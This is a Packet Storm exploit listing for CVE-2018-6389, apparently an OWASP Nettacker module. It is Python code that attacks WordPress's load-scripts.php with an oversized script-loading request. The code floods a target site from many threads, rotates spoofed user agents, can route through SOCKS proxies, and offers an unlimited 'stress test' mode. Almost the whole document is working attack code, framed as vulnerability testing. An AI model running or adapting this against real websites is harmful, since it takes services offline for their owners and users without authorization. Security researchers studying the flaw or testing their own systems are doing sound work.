WordPress Core Denial Of Service

2018-02-0600:00:00
Ali Razmjoo
packetstormsecurity.com
0.38 Low
EPSS
Percentile
96.8%
JSON
`#!/usr/bin/env python  
# -*- coding: utf-8 -*-  
#  
#  
# Developed using OWASP Nettacker - https://www.owasp.org/index.php/OWASP_Nettacker  
# Exploit Author: OWASP Nettacker  
# Description: WordPress Core - 'load-scripts.php' Denial of Service (CVE-2018-6389)  
# February 5, 2018  
#  
#  
#  
# references  
# https://www.youtube.com/watch?v=nNDsGTalXS0  
# https://baraktawily.blogspot.nl/2018/02/how-to-dos-29-of-world-wide-websites.html  
# https://github.com/viraintel/OWASP-Nettacker/blob/master/lib/vuln/wordpress_dos_cve_2018_6389/engine.py  
#  
#  
# usage:  
# vulnerability test: python nettacker.py -i http://wpsite/ -m wordpress_dos_cve_2018_6389_vuln  
# stress test without stopping: python nettacker.py -i http://wpsite/ -m wordpress_dos_cve_2018_6389_vuln --method-args wordpress_dos_cve_2018_6389_vuln_no_limit=True  
#  
#  
# you can also set threads with -t switch or test on list of targets, use --help command to learn more.  
  
  
import socket  
import socks  
import time  
import json  
import threading  
import string  
import random  
import requests  
import random  
import os  
from core.alert import *  
from core.targets import target_type  
from core.targets import target_to_host  
from core.load_modules import load_file_path  
from lib.icmp.engine import do_one as do_one_ping  
from lib.socks_resolver.engine import getaddrinfo  
from core._time import now  
from core.log import __log_into_file  
from core._die import __die_failure  
  
  
def extra_requirements_dict():  
return {  
  
"wordpress_dos_cve_2018_6389_vuln_random_agent": ["True"],  
"wordpress_dos_cve_2018_6389_vuln_no_limit": ["False"],  
}  
  
  
def send_dos(target, user_agent, timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, retries,  
socks_proxy, scan_id, scan_cmd):  
time.sleep(time_sleep)  
payload = "/wp-admin/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack" \  
",quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api" \  
"-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype" \  
",scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous" \  
"-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls," \  
"scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core," \  
"jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip" \  
",jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold," \  
"jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale," \  
"jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer," \  
"jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker," \  
"jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse," \  
"jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable," \  
"jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs," \  
"jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query," \  
"jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest," \  
"imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers," \  
"wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,json2,underscore," \  
"backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement," \  
"mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement,wp-codemirror," \  
"csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor," \  
"wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest," \  
"admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,customize-loader," \  
"customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh," \  
"customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus," \  
"wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,media-editor,media-audiovideo," \  
"mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link," \  
"comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget," \  
"media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post," \  
"inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision," \  
"media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery," \  
"svg-painter&ver=4.9.1"  
try:  
if socks_proxy is not None:  
socks_version = socks.SOCKS5 if socks_proxy.startswith('socks5://') else socks.SOCKS4  
socks_proxy = socks_proxy.rsplit('://')[1]  
if '@' in socks_proxy:  
socks_username = socks_proxy.rsplit(':')[0]  
socks_password = socks_proxy.rsplit(':')[1].rsplit('@')[0]  
socks.set_default_proxy(socks_version, str(socks_proxy.rsplit('@')[1].rsplit(':')[0]),  
int(socks_proxy.rsplit(':')[-1]), username=socks_username,  
password=socks_password)  
socket.socket = socks.socksocket  
socket.getaddrinfo = getaddrinfo  
else:  
socks.set_default_proxy(socks_version, str(socks_proxy.rsplit(':')[0]), int(socks_proxy.rsplit(':')[1]))  
socket.socket = socks.socksocket  
socket.getaddrinfo = getaddrinfo  
r = requests.get(target + payload, timeout=timeout_sec, headers=user_agent, verify=True).content  
return True  
except:  
return False  
  
  
def test(target, retries, timeout_sec, user_agent, socks_proxy, verbose_level, trying, total_req, total,  
num, language, dos_flag, log_in_file, scan_id, scan_cmd, thread_tmp_filename):  
if verbose_level > 3:  
info(messages(language, 72).format(trying, total_req, num, total, target_to_host(target), '',  
'wordpress_dos_cve_2018_6389_vuln'))  
if socks_proxy is not None:  
socks_version = socks.SOCKS5 if socks_proxy.startswith('socks5://') else socks.SOCKS4  
socks_proxy = socks_proxy.rsplit('://')[1]  
if '@' in socks_proxy:  
socks_username = socks_proxy.rsplit(':')[0]  
socks_password = socks_proxy.rsplit(':')[1].rsplit('@')[0]  
socks.set_default_proxy(socks_version, str(socks_proxy.rsplit('@')[1].rsplit(':')[0]),  
int(socks_proxy.rsplit(':')[-1]), username=socks_username,  
password=socks_password)  
socket.socket = socks.socksocket  
socket.getaddrinfo = getaddrinfo  
else:  
socks.set_default_proxy(socks_version, str(socks_proxy.rsplit(':')[0]), int(socks_proxy.rsplit(':')[1]))  
socket.socket = socks.socksocket  
socket.getaddrinfo = getaddrinfo  
n = 0  
while 1:  
try:  
r = requests.get(target, timeout=timeout_sec, headers=user_agent, verify=True).content  
return 0  
except:  
n += 1  
if n is retries:  
if dos_flag:  
__log_into_file(thread_tmp_filename, 'w', '0', language)  
info(messages(language, 139).format("wordpress_dos_cve_2018_6389_vuln"))  
data = json.dumps({'HOST': target_to_host(target), 'USERNAME': '', 'PASSWORD': '', 'PORT': '',  
'TYPE': 'wordpress_dos_cve_2018_6389_vuln',  
'DESCRIPTION': messages(language, 139).format(  
"wordpress_dos_cve_2018_6389_vuln"), 'TIME': now(), 'CATEGORY': "scan",  
'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd})  
__log_into_file(log_in_file, 'a', data, language)  
return 1  
  
  
def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language,  
verbose_level, socks_proxy, retries, ping_flag, methods_args, scan_id, scan_cmd): # Main function  
if target_type(target) != 'SINGLE_IPv4' or target_type(target) != 'DOMAIN' or target_type(  
target) != 'HTTP' or target_type(target) != 'SINGLE_IPv6':  
# rand useragent  
user_agent_list = [  
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5",  
"Googlebot/2.1 ( http://www.googlebot.com/bot.html)",  
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/10.04"  
" Chromium/9.0.595.0 Chrome/9.0.595.0 Safari/534.13",  
"Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50727)",  
"Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51",  
"Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620",  
"Debian APT-HTTP/1.3 (0.8.10.3)",  
"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",  
"Googlebot/2.1 (+http://www.googlebot.com/bot.html)",  
"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",  
"YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; "  
"http://help.yahoo.com/help/us/shop/merchant/)",  
"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)",  
"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)",  
"msnbot/1.1 (+http://search.msn.com/msnbot.htm)"  
]  
user_agent = {'User-agent': random.choice(user_agent_list)}  
limit = 1000  
# requirements check  
new_extra_requirements = extra_requirements_dict()  
if methods_args is not None:  
for extra_requirement in extra_requirements_dict():  
if extra_requirement in methods_args:  
new_extra_requirements[extra_requirement] = methods_args[extra_requirement]  
extra_requirements = new_extra_requirements  
random_agent_flag = True  
if extra_requirements["wordpress_dos_cve_2018_6389_vuln_random_agent"][0] != "True":  
random_agent_flag = False  
if extra_requirements["wordpress_dos_cve_2018_6389_vuln_no_limit"][0] != "False":  
limit = -1  
if ping_flag:  
if socks_proxy is not None:  
socks_version = socks.SOCKS5 if socks_proxy.startswith('socks5://') else socks.SOCKS4  
socks_proxy = socks_proxy.rsplit('://')[1]  
if '@' in socks_proxy:  
socks_username = socks_proxy.rsplit(':')[0]  
socks_password = socks_proxy.rsplit(':')[1].rsplit('@')[0]  
socks.set_default_proxy(socks_version, str(socks_proxy.rsplit('@')[1].rsplit(':')[0]),  
int(socks_proxy.rsplit(':')[-1]), username=socks_username,  
password=socks_password)  
socket.socket = socks.socksocket  
socket.getaddrinfo = getaddrinfo  
else:  
socks.set_default_proxy(socks_version, str(socks_proxy.rsplit(':')[0]),  
int(socks_proxy.rsplit(':')[1]))  
socket.socket = socks.socksocket  
socket.getaddrinfo = getaddrinfo  
warn(messages(language, 100).format(target, 'wordpress_dos_cve_2018_6389_vuln'))  
if do_one_ping(target, timeout_sec, 8) is None:  
return None  
threads = []  
max = thread_number  
total_req = limit  
filepath = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))  
thread_tmp_filename = '{}/tmp/thread_tmp_'.format(load_file_path()) + ''.join(  
random.choice(string.ascii_letters + string.digits) for _ in range(20))  
__log_into_file(thread_tmp_filename, 'w', '1', language)  
trying = 0  
if target_type(target) == 'SINGLE_IPv4' or target_type(target) == 'DOMAIN':  
url = 'http://{0}/'.format(target)  
else:  
if target.count(':') > 1:  
__die_failure(messages(language, 105))  
http = target.rsplit('://')[0]  
host = target_to_host(target)  
path = "/".join(target.replace('http://', '').replace('https://', '').rsplit('/')[1:])  
url = http + '://' + host + '/' + path  
if test(url, retries, timeout_sec, user_agent, socks_proxy, verbose_level, trying, total_req, total, num,  
language, False, log_in_file, scan_id, scan_cmd, thread_tmp_filename) is not 0:  
warn(messages(language, 109).format(url))  
return  
n = 0  
t = threading.Thread(target=test,  
args=(  
url, retries, timeout_sec, user_agent, socks_proxy, verbose_level, trying, total_req,  
total, num, language, True, log_in_file, scan_id, scan_cmd, thread_tmp_filename))  
t.start()  
while (n != limit):  
n += 1  
if random_agent_flag:  
user_agent = {'User-agent': random.choice(user_agent_list)}  
t = threading.Thread(target=send_dos,  
args=(url, user_agent, timeout_sec, log_in_file, language, time_sleep,  
thread_tmp_filename, retries, socks_proxy, scan_id,  
scan_cmd))  
threads.append(t)  
t.start()  
trying += 1  
if verbose_level > 3:  
info(messages(language, 72).format(trying, total_req, num, total, target_to_host(target), port,  
'wordpress_dos_cve_2018_6389_vuln'))  
try:  
if int(open(thread_tmp_filename).read().rsplit()[0]) is 0:  
if limit is not -1:  
break  
except:  
pass  
while 1:  
try:  
if threading.activeCount() >= max:  
time.sleep(0.01)  
else:  
break  
except KeyboardInterrupt:  
break  
break  
  
# wait for threads  
kill_switch = 0  
kill_time = int(timeout_sec / 0.1) if int(timeout_sec / 0.1) is not 0 else 1  
while 1:  
time.sleep(0.1)  
kill_switch += 1  
try:  
if threading.activeCount() is 2 or kill_switch is kill_time:  
break  
except KeyboardInterrupt:  
break  
thread_write = int(open(thread_tmp_filename).read().rsplit()[0])  
if thread_write is 1:  
info(messages(language, 141).format("wordpress_dos_cve_2018_6389_vuln"))  
if verbose_level is not 0:  
data = json.dumps({'HOST': target, 'USERNAME': '', 'PASSWORD': '', 'PORT': '',  
'TYPE': 'wordpress_dos_cve_2018_6389_vuln',  
'DESCRIPTION': messages(language, 141).format("wordpress_dos_cve_2018_6389_vuln"),  
'TIME': now(), 'CATEGORY': "scan",  
'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd})  
__log_into_file(log_in_file, 'a', data, language)  
os.remove(thread_tmp_filename)  
else:  
warn(messages(language, 69).format('wordpress_dos_cve_2018_6389_vuln', target))  
`